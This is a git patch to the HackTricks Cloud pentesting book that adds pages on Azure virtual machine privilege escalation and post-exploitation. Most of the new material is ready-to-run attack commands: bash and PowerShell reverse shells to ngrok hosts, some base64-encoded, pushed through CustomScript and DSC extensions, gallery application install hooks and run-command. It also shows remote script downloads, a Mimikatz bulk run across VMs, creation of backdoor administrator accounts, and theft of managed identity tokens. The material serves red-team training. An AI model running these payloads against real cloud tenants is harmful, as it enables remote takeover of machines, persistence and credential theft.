From b2956ac67275fbbb552b094065adfdad09a51e33 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 5 Dec 2024 12:43:30 +0000 Subject: [PATCH] GITBOOK-724: No subject --- SUMMARY.md | 9 +- .../az-vms-and-network-post-exploitation.md | 43 ++ ...az-virtual-machines-and-network-privesc.md | 396 ++++++++++++++++++ .../azure-security/az-services/vms/README.md | 151 +++++-- .../az-vms-unath.md | 69 +++ 5 files changed, 636 insertions(+), 32 deletions(-) create mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md create mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md create mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md diff --git a/SUMMARY.md b/SUMMARY.md index 4e523a7044..3a62487199 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -396,6 +396,7 @@ * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) + * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) 
@@ -437,12 +438,13 @@ * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) + * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) + * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) + * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) * [Az - EntraID 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) @@ -451,6 +453,7 @@ * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) + * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md new file mode 100644 index 0000000000..ee8f3ff801 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -0,0 +1,43 @@ +# Az - VMs & Network Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VMs & Network + +For more info about Azure VMs and networking check the following page: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### VM Application Pivoting + +VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md new file mode 100644 index 0000000000..ff195b69db --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -0,0 +1,396 @@ +# Az - Virtual Machines & Network Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +For more info about Azure Virtual Machines and Network check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### **`Microsoft.Compute/virtualMachines/extensions/write`** + +This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\ +Example abusing custom extensions to execute arbitrary commands in a VM: + +{% tabs %} +{% tab title="Linux" %} +* Execute a revers shell + +{% code overflow="wrap" %} +```bash +# Prepare the rev shell +echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 +YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== + +# Execute rev shell +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' +``` +{% endcode %} + +* Execute a script located on the internet + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group rsc-group> \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \ + --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}' +``` +{% endcode %} +{% endtab %} + +{% tab title="Windows" %} +* Execute a reverse shell + +{% code overflow="wrap" %} +```bash +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Execute it +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand 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"}' + +``` +{% endcode %} + +* Execute reverse shell from file + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \ + --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}' +``` +{% endcode %} + +You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` + +* Reset password using the VMAccess extension + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs: + +
+ +VMAccess extension + +This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} + +
+ +
+ +DesiredConfigurationState (DSC) + +This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: + +```powershell +# Content of revShell.ps1 +Configuration RevShellConfig { + Node localhost { + Script ReverseShell { + GetScript = { @{} } + SetScript = { + $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); + $stream = $client.GetStream(); + [byte[]]$bytes = 0..65535|%{0}; + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte, 0, $sendbyte.Length) + } + $client.Close() + } + TestScript = { return $false } + } + } +} +RevShellConfig -OutputPath .\Output + +# Upload config to blob +$resourceGroup = 'dscVmDemo' +$storageName = 'demostorage' +Publish-AzVMDscConfiguration ` + -ConfigurationPath .\revShell.ps1 ` + -ResourceGroupName $resourceGroup ` + -StorageAccountName $storageName ` + -Force + +# Apply DSC to VM and execute rev shell +$vmName = 'myVM' +Set-AzVMDscExtension ` + -Version '2.76' ` + -ResourceGroupName $resourceGroup ` + -VMName $vmName ` + -ArchiveStorageAccountName $storageName ` + -ArchiveBlobName 'revShell.ps1.zip' ` + -AutoUpdate ` + -ConfigurationName 'RevShellConfig' +``` + +
+ +
+ +Hybrid Runbook Worker + +This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/). + +
+ +### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` + +These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands. + +The last 2 permissions might be avoided by sharing the application with the tenant. + +Exploitation example to execute arbitrary commands: + +{% tabs %} +{% tab title="Linux" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group myResourceGroup \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --resource-group \ + --os-type Linux \ + --location "West US 2" + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +az sig gallery-application version create \ + --version-name 1.0.2 \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name \ + --app-version-ids 
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ + --treat-deployment-as-failure true +``` +{% endtab %} + +{% tab title="Windows" %} +{% code overflow="wrap" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --resource-group \ + --os-type Windows \ + --location "West US 2" + +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export encodedCommand="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" +az sig gallery-application version create \ + --version-name 1.0.0 \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "powershell.exe -EncodedCommand $encodedCommand" \ + --remove-command "powershell.exe -EncodedCommand $encodedCommand" \ + --update-command 
"powershell.exe -EncodedCommand $encodedCommand" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name deleteme-win4 \ + --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ + --treat-deployment-as-failure true +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +### `Microsoft.Compute/virtualMachines/runCommand/action` + +This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:** + +{% tabs %} +{% tab title="Linux" %} +```bash +# Execute rev shell +az vm run-command invoke \ + --resource-group \ + --name \ + --command-id RunShellScript \ + --scripts @revshell.sh + +# revshell.sh file content +echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh +``` +{% endtab %} + +{% tab title="Windows" %} +```bash +# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action +# Execute a rev shell +az vm run-command invoke \ + --resource-group Research \ + --name juastavm \ + --command-id RunPowerShellScript \ + --scripts @revshell.ps1 + +## Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +## Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export 
encodedCommand="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" + +# The content of +echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1 + + +# Try to run in every machine +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` +{% endtab %} +{% endtabs %} + +## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it. + +Depending on the situation more or less permissions might be needed to abuse this technique. + +{% code overflow="wrap" %} +```bash +az vm create \ + --resource-group Resource_Group_1 \ + --name cli_vm \ + --image Ubuntu2204 \ + --admin-username azureuser \ + --generate-ssh-keys \ + --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \ + --nsg-rule ssh \ + --location "centralus" +# By default pub key from ~/.ssh is used (if none, it's generated there) +``` +{% endcode %} + +### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. 
It can have the **system assigned one**, and **many user managed identities**.\ +Then, from the metadata service it's possible to generate tokens for each one. + +{% code overflow="wrap" %} +```bash +# Get currently assigned managed identities to the VM +az vm identity show \ + --resource-group \ + --name + +# Assign several managed identities to a VM +az vm identity assign \ + --resource-group \ + --name \ + --identities \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 +``` +{% endcode %} + +Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/vms/README.md b/pentesting-cloud/azure-security/az-services/vms/README.md index 3ffd8d7b63..37663d1771 100644 --- a/pentesting-cloud/azure-security/az-services/vms/README.md +++ b/pentesting-cloud/azure-security/az-services/vms/README.md @@ -49,7 +49,7 @@ Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that * Data Disks IOPS Consumed Percentage is greater than 95% * OS IOPS Consumed Percentage is greater than 95% * Network in Total is greater than 500GB - * Network Out Toral is greater than 200GB + * Network Out Total is greater than 200GB * VmAvailabilityMetric is less than 1 * **Heath monitor**: By default check protocol HTTP in port 80 * **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock). @@ -131,6 +131,16 @@ az network bastion list -o table ``` {% endcode %} +## Metadata + +The Azure Instance Metadata Service (IMDS) **provides information about running virtual machine instances** to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via **REST API available at the non-routable IP address 169.254.169.254**, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication. + +Moreover, to contact the metadata endpoint, the HTTP request must have the header **`Metadata: true`** and must not have the header **`X-Forwarded-For`**. + +Check how to enumerate it in: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} + ## VM Enumeration {% tabs %} 
@@ -296,6 +306,8 @@ Azure VM extensions are small applications that provide **post-deployment config This would allow to **execute arbitrary code inside VMs**. +The required permission is **`Microsoft.Compute/virtualMachines/extensions/write`**. + It's possible to list all the available extensions with: ```bash @@ -396,9 +408,91 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na {% endtab %} {% endtabs %} +### Relevant VM extensions + +The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**. + +
+ +VMAccess extension + +This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} + +
+ +
+ +DesiredConfigurationState (DSC) + +This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: + +```powershell +# Content of revShell.ps1 +Configuration RevShellConfig { + Node localhost { + Script ReverseShell { + GetScript = { @{} } + SetScript = { + $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); + $stream = $client.GetStream(); + [byte[]]$bytes = 0..65535|%{0}; + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte, 0, $sendbyte.Length) + } + $client.Close() + } + TestScript = { return $false } + } + } +} +RevShellConfig -OutputPath .\Output + +# Upload config to blob +$resourceGroup = 'dscVmDemo' +$storageName = 'demostorage' +Publish-AzVMDscConfiguration ` + -ConfigurationPath .\revShell.ps1 ` + -ResourceGroupName $resourceGroup ` + -StorageAccountName $storageName ` + -Force + +# Apply DSC to VM and execute rev shell +$vmName = 'myVM' +Set-AzVMDscExtension ` + -Version '2.76' ` + -ResourceGroupName $resourceGroup ` + -VMName $vmName ` + -ArchiveStorageAccountName $storageName ` + -ArchiveBlobName 'revShell.ps1.zip' ` + -AutoUpdate ` + -ConfigurationName 'RevShellConfig' +``` + +
+ +
+ +Hybrid Runbook Worker + +This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-automation-account/). + +
+ ### VM Applications -These ara packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs. +These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs. {% code overflow="wrap" %} ```bash @@ -410,7 +504,7 @@ az sig gallery-application list --gallery-name --resource-group < ``` {% endcode %} -These are the paths were the applications get downloaded intide the file system: +These are the paths were the applications get downloaded inside the file system: * Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//` * Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\` 
@@ -418,11 +512,21 @@ These are the paths were the applications get downloaded intide the file system: Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli) {% hint style="danger" %} -It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting becase it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants. +It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants. {% endhint %} But there **isn't a "marketplace" for vm apps** like there is for extensions. +The permissions required are: + +* `Microsoft.Compute/galleries/applications/write` +* `Microsoft.Compute/galleries/applications/versions/write` +* `Microsoft.Compute/virtualMachines/write` +* `Microsoft.Network/networkInterfaces/join/action` +* `Microsoft.Compute/disks/write` + +Exploitation example to execute arbitrary commands: + {% tabs %} {% tab title="Linux" %} ```bash @@ -527,7 +631,7 @@ echo "Hello World" > /var/tmp/output.txt ### **Run Command** -This is the most basic mechanism Azure provides to execute arbitrary commands in VMs: +This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`. {% tabs %} {% tab title="Linux" %} 
@@ -574,40 +678,29 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt {% endtab %} {% endtabs %} -## **Run commands in a VM** - -### **AAD Login in VM** +## Privilege Escalation -It's possible to allow access to users authenticated via AzureAD. For example trying to access a **linux VM**: `ssh username@azure-corp.com@1.1.1.1` (it's important to **use the email** with the azurecorp used when trying to login) you could get an error like: - -{% code overflow="wrap" %} -``` -(username@azure-corp.com@1.1.1.1) This preview capability is not for production use. When you sign in, verify the name of the app on the sign-in screen is "Azure Linux VM Sign-in" and the IP address of the target VM is correct. - -To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DT4PNSTGR to authenticate. Press ENTER when ready. -``` -{% endcode %} - -Just **follow those instructions** going to [https://microsoft.com/devicelogin](https://microsoft.com/devicelogin) and indicating the code, use the email and password as credentials and you will be able to connect via SSH (if that user has enough permissions to do so: `Virtual Machine Administrator Login` or `Virtual Machine User Login` role). - -### DesiredConfigurationState (DSC) - -DesiredConfigurationState (DSC) is a PowerShell tool similar to Ansible, used for setting up a host through code. DSC integrates with Azure, allowing the upload of specific configuration files. These files must adhere to a strict syntax. Notably, the DSC extension in Azure can execute commands from files that meet certain formatting criteria, even if the syntax is not correct for DSC standards, as shown in the provided figure. - -The execution of these commands is facilitated by the [**`Publish-AzVMDscConfiguration`**](https://docs.microsoft.com/en-us/powershell/module/az.compute/publish-azvmdscconfiguration?view=azps-7.5.0) function in Az PowerShell. 
